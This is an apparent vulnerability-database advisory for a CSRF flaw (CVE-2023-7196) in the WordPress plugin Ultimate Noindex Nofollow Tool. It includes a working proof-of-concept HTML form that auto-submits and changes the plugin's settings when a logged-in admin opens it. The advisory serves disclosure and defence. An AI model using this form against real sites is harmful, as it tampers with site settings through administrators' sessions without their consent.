Ultimate Noindex Nofollow Tool <= 1.1.2 – Settings Update via CSRF | CVE 2023-7196 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

Proof of Concept

Have an admin open an HTML file containing the following:

```
<form action="https://example.com/wp-admin/options-general.php?page=ultimate-noindex-nofollow-tool/ultimate-noindex.php" method="POST">
    <input type="text" name="unn_hidden" value="Y">
    <input type="text" name="unn_noindex_pages" value="1,2,3,4">
    <input type="text" name="unn_nofollow_pages" value="">
    <input type="text" name="Submit" value="Update Options">
</form>
<script>
    document.forms[0].submit();
</script>
```

Affects Plugins

ultimate-noindex-nofollow-tool

No known fix

References

CVE

URL

https://magos-securitas.com/txt/CVE-2023-7196.txt

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://magos-securitas.com

Verified

Yes

WPVDB ID

15ea1ffd-5a0c-422c-8c9c-7b632516a156

Timeline

Publicly Published

2024-01-23 (about 1 year ago)

Added

2024-01-23 (about 1 year ago)

Last Updated

2024-01-23 (about 1 year ago)

Other

Published

Title

Published

2014-08-01

Title

XCloner - Backup and Restore < 3.1.1 - Multiple Actions CSRF

Published

2025-10-27

Title

Media Library File Download <= 1.4 - Cross-Site Request Forgery

Published

2023-02-08

Title

ColorWay <= 4.2.3 - Cross-Site Request Forgery

Published

2024-12-11

Title

GitSync <= 1.1.0 - Cross-Site Request Forgery to Remote Code Execution

Published

2022-05-02

Title

StaffList < 3.1.6 - Arbitrary Staff Deletion via CSRF